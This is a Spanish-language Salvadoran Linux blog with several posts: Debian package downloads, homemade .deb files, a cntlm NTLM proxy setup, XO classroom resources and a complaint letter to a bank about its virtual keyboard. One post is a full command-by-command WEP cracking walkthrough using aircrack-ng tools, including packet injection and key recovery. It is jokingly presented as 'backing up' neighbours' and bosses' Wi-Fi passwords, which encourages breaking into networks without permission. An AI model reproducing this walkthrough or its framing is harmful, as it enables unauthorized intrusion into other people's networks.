Búsqueda

lunes, 18 de noviembre de 2013

Descargar en chuchumustillos los paquetes para armar el tamal de Debian

Tux con paquetitos debianSiempre he andado buscando la manera de replicar las instalaciones que hago, se ha debido mucho a que empecé laborando en un cibercafé y cada cierto tiempo reinstalábamos todo los equipos del ciber y queríamos automatizar las cosas, hemos llegado hasta hacer un Live CD a la medida sólo para no complicarnos y así también sugerirlo como alternativa a quienes tengan equipos de la misma arquitectura.

En esas pilas de querer lograr tener a la mano los instaladores nunca se me ocurrió explorar las facultades de la herramienta para instalar (aptitude), siempre nos rebuscamos por sacar los archivos del caché de descarga, o hacer imágenes con partimage u otros, terminando con el cd live que mucho nos ayudó. Hasta hace un par de semanas vi que fabulosamente aptitude tiene un parámetro muy útil, download, y es muy útil, así que haciendo una secuencia de cosas puedo tener los paquetes para compartirlos con la gente :)

Primero le instalo todas las florituras que se me ocurran al equipo, agrego todo tipo de fuentes y los dejo tal cual para poder acceder a los paquetes, una vez listo todo empezamos:

Primero obtengo una lista de nombres de paquetes instalados en la máquina y lo guardo en un archivo:
dpkg --get-selections | cut -f 1 > misdebs.txt

Luego (a prueba y error) me dí cuenta que también me lista algunos paquetes instalados desde archivos descargados manualmente por lo que tengo que depurar la lista, cuando traté de instalarlos me mostró un mensaje de que no podía descargarlos, así que ocupé eso para poder obtener la lista (debe existir una manera mas fácil)
aptitude download $(cat misdebs.txt ) 2> nohay.txt

Al realizar la línea anterior me mostraba un mensaje de error que era capturado, por lo que copiaba el nombre del paquete mencionado en el mensaje, se llama libmozjs24d, mas adelante lo ocuparía, el listado generado en nohay.txt incluye, aparte de los nombres de los paquetes, texto de información del error, el cual simplemente no necesitamos, por lo que se limpia extrayendo sólo la lista de paquetes:
cat nohay.txt | cut -d " " -f 9 > quitar.txt

Luego se edita el archivo quitar.txt para agregar el nombre del paquete mostrado en el error mencionado, yo busqué dejarlo en el orden donde alfabéticamente debería ser ubicado, no se si eso afecte, pero mejor no complicarse y lo coloqué donde debería estar, para luego extraer de mi lista de paquetes (misdebs.txt) los paquetes que me dan problema por haberlos instalado por otros medios (quitar.txt) y almacenarlos en na lista de paquetes a descargar:
diff misdebs.txt quitar.txt | grep "<" | cut -d " " -f 2 > descargar.txt

Ahora finalmente tengo la lista de paquetes que si puedo descargar y se procede a obtenerlos:
aptitude download $( cat descargar.txt ) 

Luego de una espera, la cual puede variar si no poseemos acceso a un espejo local de paquetes y de la taza de transferencia de nuestros repositorios de fuentes de paquetes.

Finalmente solo queda almacenar los paquetes descargados o crear un disco (con aptoncd) para utilizar con APT, en el mejor de los casos un dpkg -i *deb podría actualizar todo... aún estoy pendiente de probarlo :)

Espero les sea de su utilidad y a seguir replicando instalaciones ¡For the world domination!

martes, 15 de octubre de 2013

Un deb totoposteado que estaba jocote de instalar

Un cipote de la luterana (Manuel "Mint" Molina... 3M) investigó como hacer para instalar DB Designer Fork en Debian Wheezy, hay varias referencias en internet y todas estaban relacionadas a las librerías con las que corre y fue fabricado el programa.
Siguiendo la guía que el cipote nos dio se pudo armar un par de archivos deb que permitirán la instalación del DBDesigner Fork de manera mas cómoda.
primero hay que instalar un paquete que si viene en debian
aptitude install libjpeg62
Y luego instalar los dos paquetes enlazados a continuación del párrafo con un simple dpkg, o gdebi o alguna otra cosa que gusten usar para instalar en Debian los paquetes deb

Y desde el Google drive :D
La última vez desaparecieron los debs porque nadie los descargó, por eso hoy los pongo en varios lados :P, espero les sean de utilidad :)

martes, 30 de octubre de 2012

Algunos debs totoposteados

De vez en cuando me gustan algunos programas que no vienen en Debian, y en ocasiones vienen en las versiones anteriores y el binario mas reciente que distribuyen sus creadores son funcionales, por eso comparto acá algunos de esos programas paquetes, convertidos en archivos deb para poder hacer dpkg -i, los deb que hice el deb que sobrevivió no es son la gran cosa, pero sirven para facilitar la tarea de instalar y desinstalar, y si desean pueden urgar el paquete para no desconfiar del mismo ;)

Un tema de iconos, kfaenza, se encuentra en kde-look.org en tarbal, acá les comparto el deb:
kfaenza-icon-theme.deb

Un diseñador de bases de datos, dbdesignerfork, me gusta porque puedo exportar guiones sql a postgres con él:
dbdesigner-1.0_all.deb

Un editor para aprender a programar con pseudolenguaje en español. Muy bueno llamado pseint:
pseint-1.3.2_all.deb

El programador de Arduino, la versión 1.0.1 es compatible con un arduino que me conseguí y la que venía en Debian Squeeze no, así que ahí esta:
arduino-1.0.1_all.deb

A medida siga haciendo este tipo de chunches, los iré subiendo para compartirlos, aviso de antemano que NO SON paquetes bien armados, simplemente son para facilitar la instalación y desinstalación en Debian Squeeze.

Saludos a todos

viernes, 6 de julio de 2012

Un splash de libreoffice adaptado para el trabajo

Existen buenos temas para aplicar en la pantalla de inicio de LibreOffice, durante este año se procedió a promoverlo mucho pues el MINED usará LibreOffice para las estaciones de trabajo, por lo que un buen amigo adapto una de esas pantallas (Basado en el tema de Trisquel), agregándole un logo de la institución con Gimp.

Así que para que varios usuarios puedan compartirlo se creo un script que pudiese facilitar la instalación en Debian (siempre y cuando libreoffice se instalase desde los repositorios), pongo acá a disposición el arhcivo compreso para que puedan descargarlo, compartirlo o modificarlo como se les antoje :) splash.tbz

Para poder instalarlo, sólo hay que descomprimirlo y como root ejecutar el guión de bash que viene dentro de la carpeta:

tar xvfj splash.tbz
cd splash
./instalar.sh

miércoles, 13 de junio de 2012

Saliendose de la red rempujadito con vaselina

Actualmente en muchos lugares se tiene una red con un proxy 'fello' de esos de la empresa M$, por lo que hacer que estaciones que utilizan GNU/Linux puedan navegar sin complicaciones y utilizar todas las ventajas de aplicaciones conectadas a la red que utilizan ese 'fello' proxy es tortuoso.

Había probado anteriormente con el uso de ntlmaps, y por razones que no comprendo la configuración en un reinicio desde consola no se cargaba, por lo que mi inexperiencia me llevó a reiniciar todo el equipo cada vez que sucedía.

También sucedía que en la navegación no cargaba todos los contenidos de las páginas web a al primera, tenía que realizar un refresco de página para poder ver los contenidos faltantes.

Luego buscando una alternativa me tope con el programa cntlm, que hace exactamente lo mismo, y la configuración es más simple.

Desde nuestros queridísimos y amadísimos repositorios de Debian podemos hacer la instalación con un simple:
aptitude install cntlm

Luego hay que configurar el archivo /etc/cntlm.conf:
nano /etc/cntlm.conf

En las primeras líneas (de la 8 a la 10) encontramos un texto como el siguiente:
Username        testuser
Domain          corp-uk
Password        password


Las cambiamos por nuestro respectivo usuario, y comentamos la Password para que no quede en texto plano, luego la colocaremos como se debe, dejando por el momento las lineas como el ejemplo siguiente:
Username        gato
Domain          ministerio.gob.sv
#Password       password

Luego se guarda el archivo, y se procede a conseguir la pasword en modo encriptado... o por lo menos más difícil de distinguir en el texto plano, por lo que hay que ejecutar desde la linea de comandos lo siguiente:
cntlm -H

Esto pedirá una password, hay que introducir la que tengamos en nuestro dominio W$ y generará el hash de varios tipos de posibles autenticaciones para el usuario creado, muy parecido a lo siguiente:
PassLM          EF6470B2EB92A88EC2E36D82E36F3983
PassNT          3671C476E516996470735032B0432B13
PassNTLMv2      10C8E4D429A6A3880DDEB64700067403    # Only for user 'gato', domain 'ministerio.gob.sv'

Hay que copiar las tres lineas y agregarlas en el archivo que editamos antes (/etc/cntlm.conf) quedando así:
Username        gato
Domain          ministerio.gob.sv
#Password       password
PassLM          EF6470B2EB92A88EC2E36D82E36F3983
PassNT          3671C476E516996470735032B0432B13
PassNTLMv2      10C8E4D429A6A3880DDEB64700067403    # Only for user 'gato', domain 'ministerio.gob.sv'

Y antes de guardarlo buscamos (aproximadamente en la línea 32) la variable Proxy , la cual la modificaremos para que quede justo como sea que este configurado nuestro proxy indicando la ip, seguida de dos puntos y el puerto, tal como este el de M$ en la institución, como por ejemplo así:
Proxy           192.168.19.40:80

Ahora si, hay que guardarlo, y una vez guardado se reinicia el servicio:
/etc/init.d/cntlm restart

Luego de eso, es de configurar los navegadores y demás chunches que usen proxy, indicando que el proxy es localhost y el puerto 3128, de manera que en kde por ejemplo se puede configurar globalmente para todas las aplicaciones de kde o según sea el caso de cada aplicación.

Espero les sea de utilidad :)

sábado, 22 de enero de 2011

Actividades de la XO y otros recursos libres

 Hace un poco mas de un año que conocí la XO, me pareció una herramienta educativa muy útil para el niño/a en la estimulacion de su aprendizaje y crearle esa curiosidad por la tecnología. A parte que les ayuda muchísimo a estimular su imaginación.

Hace un poco mas de un año..comenzamos con mi esposo en la creación de guiones de clase(posteado anteriormente) de algunas actividades orientadas a la educación parvularia(niños de 4,5,6 años) que se le instalaron a la XO para un proyecto que se esta dando en algunos lugares de nuestro país.

  Por acá esta este enlace que nos facilitara un poco mas el uso de la actividad Tam Tam Mini y unas canciones que se pueden tocar
Guia de uso y canciones para Tam Tam mini

  Para los que tienen problemitas con el Tux Paint por acá les dejo un manual, para que les sirva como una guia. Hay varios manuales en la red, pero este es el que explica mas :)
Manual de Tux Paint

Si por si acaso no lo tienen y tienen la curiosidad de usarlo, y que tus alumnos/as o sus hijos lo puedan usar, por acá están unos enlaces para bajarlo, es completamente libre, lo puedes bajar y usar cuando quieras, es la ventaja de ser software libre
Bajar Tuxpaint
Bajar Tuxpaint En este enlace te vas hasta abajo de la pagina y le haces click a descarga externa.
Bajar Tux Paint
En cualquiera de estos tres enlaces puedes bajarte este programa, que se puede utilizar tanto en tu computadora como en la XO.

    Buscando entre uno y otro enlace de algunas actividades para la XO..llegue hasta este lugar, es de Uruguay, pero tiene unos lindos recursos para el docente, para aquel que necesita alguna idea o ayuda en su salón de clases, PLAN CEIBAL, muy bueno, excelente  Recursos educativos recomendados

Espero que esto les ayude a aquellos que tienen algunas dudas sobre las actividades Tam Tam Mini, y Tuxpaint, los enlaces tienen mucha información,y lo mejor que es libre, y en dado caso se puede retomar y adaptar al ámbito de nuestro país El Salvador.   :)

jueves, 2 de diciembre de 2010

Respaldando la contraseña de los puntos de acceso de nuestros vecinos

Se nos ha presentado en muchas ocasiones la necesidad de poder ayudar a que nuestro vecinos, que tienen sus puntos de acceso protegidos con claves de tipo WEP, nunca olviden o pierdan sus contraseñas.
Como buenos ciudadanos podemos usar herramientas de Software Libre para colaborarles en la tarea de almacenarles caritativamente sus contraseñas en nuestro basto espacio de disco duro :).
Primero que nada necesitamos una tarjeta de red inalámbrica con capacidades para hacer esta tarea, son muy famosas las de chip Atheros para estas tareas, aunque hace poco probé con una Broadcom en la oficina y cuando mis jefes se enteren de que respalde la contraseña de su red creo que se sentirán muy orgullosos de que busco la manera para que no olviden como acceder a su red inalámbrica con mayores libertades que la institucional.
Bueno lo segundo es tener un flamante GNU/Linux instalado con la tarjeta de red configurada, en mi caso el poderoso Debian es suficiente, en el existen las herramientas necesarias para lograrlo.
Empezando hay que instalar el paquete aircrack-ng por si no está instalado:
# aptitude install aircrack-ng
Una vez con esto instalado primero tenemos que tomar algunos datos importantes, el primero es que tenemos que saber cosas del punto de acceso, y esas cosas son el nombre, la dirección de hardware y el canal por el cual envía la señal, para ello ejecutamos el siguiente comando:
# iwlist wlan0 scann | grep Cell -A 5
Esto mostrará una salida como esta:
Cell 01 - Address: 64:68:0C:77:A7:E4
                    Channel:1
                    Frequency:2.412 GHz (Channel 1)
                    Quality=51/70  Signal level=-59 dBm  
                    Encryption key:on
                    ESSID:"VECINO"
De ahí sacamos los datos de la dirección de hardware:

Address: 64:68:0C:77:A7:E4

El canal por el cual transmite:

Channel:1

Y el nombre de la red:

ESSID:"VECINO"

Con estos datos ya podremos proceder a buscar como respaldar la contraseña de ese punto de acceso, primero debemos colocar nuestra tarjeta en modo monitor:
# airmon-ng start wlan0 1
En lo anterior wlan0 es el nombre de la tarjeta de red en el sistema operativo y el 1 es el canal al que necesitamos conectarnos, al hacer eso crea un monitor como si fuera una interfaz adicional de tarjeta de red y le llama mon0 (sí se ejecuta varias veces mon1, mon2, etc...).
Despues hay que empezar a capturar paquetes de transito de esa red, para lo que se usa la herramienta de captura de los datos.
# airodump-ng -c 1 -w wep123 --bssid "64:68:0C:77:A7:E4" mon0
En el comando anterior va un '-c 1', donde el 1 es el canal otra vez y "64:68:0C:77:A7:E4" es la dirección de hardware del punto de acceso, y 'wep123' es el patron de un grupo de archivos que llevarán ese nombre en la carpeta donde se está ejecutando el comando.
Esto ocupara la terminal, por lo que sería bueno ocupar otra terminal para seguir, teniendo que asociarse al punto de acceso para poder generarle tráfico, se hace una asociación breve con:
# aireplay-ng -1 0 -a "64:68:0C:77:A7:E4" -e "VECINO" mon0
En el comando anterior otra vez se puede identificar la dirección de hardware "64:68:0C:77:A7:E4" y el nombre del punto de acceso "VECINO" y la interfaz que hace de monitor mon0, luego de ejecutar esto dice Association succesful :-), lo que significa que estamos asociados al punto de acceso.

Acto seguido hay que hacer que el punto de acceso genere tráfico, y como es de esperarse a veces nuestros vecinos no es que pasen ocupando mucho la completa capacidad del punto de acceso, así que hay que ayudarles a que generen ese tráfico de red con el comando siguiente:
# aireplay-ng -3 -b "64:68:0C:77:A7:E4" mon0
Ya aburro escribiéndolo pero es necesario reacalcarlo, en la ejecución anterior se nota la dirección de hardware del punto de acceso "64:68:0C:77:A7:E4" y la interfaz del monitor mon0.
Al hacer esto nuevamente la terminal será acaparada, pues mostrará que está enviando paquetes y verán un número incrementarse, en la primera consola o terminal que dejamos trabajando al inicio también veremos que en la tabla mostrada, bajo la columna que dice #Data habrá un número incrementándose de manera muy rápida (y que antes no lo hacía), hay que esperar a que llegue a un número de 20,000 o mas (no se tardará mucho en hacerlo).
Una vez echo esto de haber esperado a 20,000 paquetes o más en la ejecución de la captura de datos de esa tabla, hay que cancelarla con [Control] + [C].
Inmediatamente hay que ver que los archivos del directorio están listos para ser analizados, las capturas las almacena con un identificador en el nombre, por lo que si es la primera vez el archivo que necesitamos se llama wep123-01.cap, (pero si hemos ejecutado este comando muchas veces el número después del guión variaría como por ejemplo wep123-09.cap) asumiendo que todo está bien y es nuestra primera vez que deseamos ayudar a nuestro vecino sólo nos falta ejecutar este comando:
# aircrack-ng -n 64 -b "64:68:0C:77:A7:E4" wep123-01.cap
Luego de un par de extraños códigos que se mueven en nuestra pantalla veremos aparecer abajo de ellos algo parecido a esto:
KEY FOUND! [ 68:0C:77:A7:E3 ]
Esta clave encontrada en el ejemplo es un hexadecimal, por lo que al ponerla en las configuraciones de red no es necesario colocar los dos puntos entre cada número, hay casos en que la contraseña es alfanumérica y aparece como tal al final del ejercicio.
Ahí termina nuestra afable labor de conservarle la contraseña a nuestro vecino, pudiendo almacenarla en nuestro catálogo amplio de datos que no debemos olvidar para cuando sean necesarios.
Espero que seamos personas de bien y le ayudemos a toda la colonia a poder recordarles las claves de los puntos de acceso donde sean necesarios, incluso a nuestros jefes por si se les olvida ;).

viernes, 2 de julio de 2010

Carta de enojo abierta al Banco Agrícola por su µ!3®ð4 de teclado virtual

Escribí un mensaje encachimbado porque me tocó resetar la password, a causa de la implementación del teclado virtual del sitio e-banca, pues queriendo comprobar su afirmación acerca de las minúsculas, terminé bloqueando mi usuario.

Luego al acceder intente escribirles un mensaje en la opción de "contactenos", y misteriosamente se me cerró, zopapeé la mesa donde me encontraba y escribí este otro mensaje, que creo les irá a caer en /dev/null, más el intento lo hice y quisiera compartir mi disconformidad

Acerca del teclado virtual

El teclado virtual que han decidido colocar para el acceso web al sistema de e-banca no contribuye en la seguridad, al contrario la hace mas vulnerable para los usuarios mas habidos.

1 - Es mas fácil ver detrás de un usuario sobre que teclas virtuales hizo clic pues no las tapan sus manos como en el caso del teclado.
2 - Limitan al usuario a usar claves inseguras de 65 posibles caracteres por byte, ante la verdadera posibilidad de usar 256 posibles caracteres que brinda la tabla ASCII, y que decir en el caso de UTF8
3 - Su servicio al cliente es perturbador, al tratar de convencer al usuario en que solo acepta mayúsculas y no hace distinción de las minúsculas (lo he comprobado el día de hoy 2/Jul/2010).

Seguramente no tratan de resolver problemas tan importantes como estos en los que lejos de colaborar en la seguridad del usuario causan una gran incomodidad, la alternativa decidida (con las disculpas del caso) es bajo completa ignorancia de la persona que lo sugirió y del que lo acepto para que se implementara.

El teclado virtual en sitios seguros (bajo protocolos de ssl como https que es el que usan) pueden ser de utilidad para personas que necesitan accesibilidad a su interfaz, por lo que es bueno para esa característica pero no para la seguridad.

Tienen otra limitante en cuanto a la longitud de la contraseña, los sistemas informáticos que piensan en detalles de seguridad implementan en la actualidad el concepto de PASPHRASE el cual consiste en el uso de claves de acceso de mayor longitud (literalmente frases de paso).

Muchos de los usuarios de sus servicios, en los cuales confiamos como empresa nos parecen adecuados, por eso hacer notar este tipo de errores es necesario. Dentro de ese grupo de clientes existen varios expertos del campo de la informática (no me incluyó pues carezco de título universitario que me lo respalde), pero consideren que es como ofrecer lodo en vez de café a sus visitantes al brindar servicios que degradan la imagen que pueda tenerse de su corporación.

Se que de alguna manera no tomarán en cuenta este mensaje, dado que es mi segundo intento de escribirlo (la primera vez la interfaz web se me cerró misteriosamente antes de poder enviarlo... ¿habrá vencido la variable de sesión web?) y espero que si aún persisten en mantener esa ridícula herramienta para acceso consideren la opinión de mejorar por lo menos con la longitud de las contraseñas e incluirles caracteres adicionales como los que se encuentran en la tabla UTF-8.

Acá les dejo un enlace de un teclado virtual muy parecido al suyo que incluye las minúsculas, podrían fácilmente adaptarlo para darle la supuesta seguridad de alternar las teclas y los colorcitos #2E659D y #3173B8 que actualmente usan en su css.


Atentamente
José David Calderón Serrano
"Nunca se tiene suficiente de algo bueno"
- Gato Garfield -